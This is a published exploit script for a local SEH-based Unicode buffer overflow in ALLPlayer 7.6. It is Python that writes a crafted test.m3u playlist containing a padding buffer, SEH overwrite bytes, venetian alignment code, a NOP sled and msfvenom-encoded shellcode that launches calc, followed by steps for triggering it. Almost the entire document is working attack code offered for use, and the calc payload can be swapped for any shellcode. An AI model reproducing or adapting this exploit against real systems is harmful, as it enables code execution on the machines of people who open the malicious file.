ALLPlayer 7.6 Buffer Overflow

`  
  
# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)  
# Version: 7.6  
# Date: 20-04-2020  
# Exploit Author: Xenofon Vassilakopoulos  
# Tested on: Windows 7 Home Premium SP1 x86  
  
# Steps to reproduce :  
# 1. generate the test.m3u using this exploit   
# 2. open ALLPlayer then go to Open audio file   
# 3. load the test.m3u file   
# 4. calc  
  
filename = "test.m3u"  
  
junk="A"*301  
  
nseh = "\x61\x6e" # popad align  
seh = "\x12\x74" # pop ebx # pop ebp # ret 0x04   
  
  
align=("\x56" # push esi  
"\x6e" # venetian shellcode  
"\x58" # pop eax  
"\x6e" # venetian shellcode  
"\x05\x19\x11" # add eax,0x11001900  
"\x6e" # venetian shellcode   
"\x2d\x16\x11" # sub eax,0x11001600  
"\x6e" # venetian shellcode   
"\x50" # push eax  
"\x6e" # venetian shellcode   
"\xc3" # retn  
)  
  
nop="\x90"*45  
  
# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python  
shellcode= b""  
shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"  
shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"  
shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"  
shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"  
shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"  
shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"  
shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"  
shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"  
shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"  
shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62"  
shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e"  
shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b"  
shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61"  
shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61"  
shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c"  
shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57"  
shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c"  
shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31"  
shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62"  
shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39"  
shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64"  
shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31"  
shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61"  
shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d"  
shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c"  
shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b"  
shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b"  
shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74"  
shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f"  
shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b"  
shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32"  
shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30"  
shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a"  
shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58"  
shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f"  
shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70"  
shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52"  
shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53"  
shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41"  
  
payload=junk+nseh+seh+align+nop+shellcode  
  
fill="D"*(5000-len(payload))  
  
payload+=fill  
f=open(filename,"wb")  
f.write('http://'+payload)  
print "\nFile created with %d bytes" % len(payload)  
f.close()  
`